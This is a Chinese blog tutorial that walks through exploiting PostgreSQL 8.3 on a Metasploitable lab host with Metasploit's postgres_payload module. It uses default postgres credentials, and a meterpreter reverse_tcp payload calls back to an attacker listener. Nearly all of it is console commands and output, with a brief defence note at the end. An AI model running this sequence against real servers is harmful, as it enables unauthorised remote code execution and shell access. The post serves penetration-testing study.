美文网首页网络安全
Metasploit实战:postgresql代码执行

Metasploit实战:postgresql代码执行

作者: DreamsonMa | 来源:发表于2019-07-14 13:29 被阅读57次

    postgresql介绍

    PostgreSQL是以加州大学伯克利分校计算机系开发的 POSTGRES,现在已经更名为PostgreSQL,版本 4.2为基础的对象关系型数据库管理系统(ORDBMS)。PostgreSQL支持大部分 SQL标准并且提供了许多其他现代特性:复杂查询、外键、触发器、视图、事务完整性、MVCC。同样,PostgreSQL 可以用许多方法扩展,比如, 通过增加新的数据类型、函数、操作符、聚集函数、索引。免费使用、修改、和分发 PostgreSQL,不管是私用、商用、还是学术研究使用。https://www.postgresql.org/

    探测目标postgresql

    使用 nmap -sV -p 5432 IP地址 探测目标postgresql版本信息。

    ➜  ~ nmap -sV 10.0.2.5 | grep sql
    3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
    5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
    

    postgresql代码执行利用

    利用 msf 下 postgresql的 代码执行获得反弹shell.

    1、打开msfconsole控制台

    ➜  ~ msfconsole
    [-] ***rting the Metasploit Framework console...-
    [-] * WARNING: No database support: No database YAML file
    [-] ***
                                                      
    
     ______________________________________________________________________________
    |                                                                              |
    |                   METASPLOIT CYBER MISSILE COMMAND V5                        |
    |______________________________________________________________________________|
          \                                  /                      /
           \     .                          /                      /            x
            \                              /                      /
             \                            /          +           /
              \            +             /                      /
               *                        /                      /
                                       /      .               /
        X                             /                      /            X
                                     /                     ###
                                    /                     # % #
                                   /                       ###
                          .       /
         .                       /      .            *           .
                                /
                               *
                      +                       *
    
                                           ^
    ####      __     __     __          #######         __     __     __        ####
    ####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
    ################################################################################
    ################################################################################
    # WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
    ################################################################################
                                                               https://metasploit.com
    
    
           =[ metasploit v5.0.2-dev                           ]
    + -- --=[ 1852 exploits - 1046 auxiliary - 325 post       ]
    + -- --=[ 541 payloads - 44 encoders - 10 nops            ]
    + -- --=[ 2 evasion                                       ]
    + -- --=[ ** This is Metasploit 5 development branch **   ]
    

    2、查找postgresql漏洞利用模块

    msf5 > search postgresql
    
    Matching Modules
    ================
    
       Name                                                       Disclosure Date  Rank       Check  Description
       ----                                                       ---------------  ----       -----  -----------
       auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
       auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
       auxiliary/admin/postgres/postgres_readfile                                  normal     No     PostgreSQL Server Generic Query
       auxiliary/admin/postgres/postgres_sql                                       normal     No     PostgreSQL Server Generic Query
       auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal     Yes    PostgreSQL Database Name Command Line Flag Injection
       auxiliary/scanner/postgres/postgres_login                                   normal     Yes    PostgreSQL Login Utility
       auxiliary/scanner/postgres/postgres_version                                 normal     Yes    PostgreSQL Version Probe
       auxiliary/server/capture/postgresql                                         normal     No     Authentication Capture: PostgreSQL
       exploit/linux/postgres/postgres_payload                    2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
       exploit/multi/http/manage_engine_dc_pmp_sqli               2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
       exploit/multi/postgres/postgres_createlang                 2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
       exploit/windows/postgres/postgres_payload                  2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
       post/linux/gather/enum_users_history                                        normal     No     Linux Gather User History
    

    3、使用exploit/linux/postgres/postgres_payload

    msf5 > use exploit/linux/postgres/postgres_payload
    msf5 exploit(linux/postgres/postgres_payload) > set rhosts 10.0.2.5
    rhosts => 10.0.2.5
    

    4、选择payload

    msf5 exploit(linux/postgres/postgres_payload) > show payloads
    
    Compatible Payloads
    ===================
    
       Name                                      Disclosure Date  Rank    Check  Description
       ----                                      ---------------  ----    -----  -----------
       generic/custom                                             normal  No     Custom Payload
       generic/debug_trap                                         normal  No     Generic x86 Debug Trap
       generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
       generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
       generic/tight_loop                                         normal  No     Generic x86 Tight Loop
       linux/x86/chmod                                            normal  No     Linux Chmod
       linux/x86/exec                                             normal  No     Linux Execute Command
       linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
       linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
       linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
       linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
       linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
       linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
       linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
       linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
       linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
       linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
       linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
       linux/x86/read_file                                        normal  No     Linux Read File
       linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
       linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
       linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
       linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
       linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
       linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
       linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
       linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
       linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
       linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
       linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
       linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
       linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
       linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)
    
    msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
    payload => linux/x86/meterpreter/reverse_tcp
    msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.0.2.12
    lhost => 10.0.2.12
    

    5、检查参数设置

    msf5 exploit(linux/postgres/postgres_payload) > show options
    
    Module options (exploit/linux/postgres/postgres_payload):
    
       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       DATABASE  template1        yes       The database to authenticate against
       PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
       RHOSTS    10.0.2.5         yes       The target address range or CIDR identifier
       RPORT     5432             yes       The target port
       USERNAME  postgres         yes       The username to authenticate as
       VERBOSE   false            no        Enable verbose output
    
    
    Payload options (linux/x86/meterpreter/reverse_tcp):
    
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  10.0.2.12        yes       The listen address (an interface may be specified)
       LPORT  4444             yes       The listen port
    
    
    Exploit target:
    
       Id  Name
       --  ----
       0   Linux x86
    

    6、开始渗透攻击

    msf5 exploit(linux/postgres/postgres_payload) > run
    
    [*] Started reverse TCP handler on 10.0.2.12:4444 
    [*] 10.0.2.5:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
    [*] Uploaded as /tmp/WaGyEMSt.so, should be cleaned up automatically
    [*] Sending stage (914728 bytes) to 10.0.2.5
    [*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35547) at 2019-07-14 01:28:44 -0400
    
    meterpreter > sysinfo
    Computer     : metasploitable.localdomain
    OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
    Architecture : i686
    BuildTuple   : i486-linux-musl
    Meterpreter  : x86/linux
    meterpreter > shell
    Process 5163 created.
    Channel 1 created.
    id
    uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres)
    

    提权

    参考:Metasploit实战:Telnet暴破和提权

    防御修复

    防御:屏蔽任意IP连接Postgresql
    修复:升级版本,安全配置

    推荐汇总贴: 漏洞利用套路汇总

    相关文章

      网友评论

        本文标题:Metasploit实战:postgresql代码执行

        本文链接:https://www.haomeiwen.com/subject/vevbkctx.html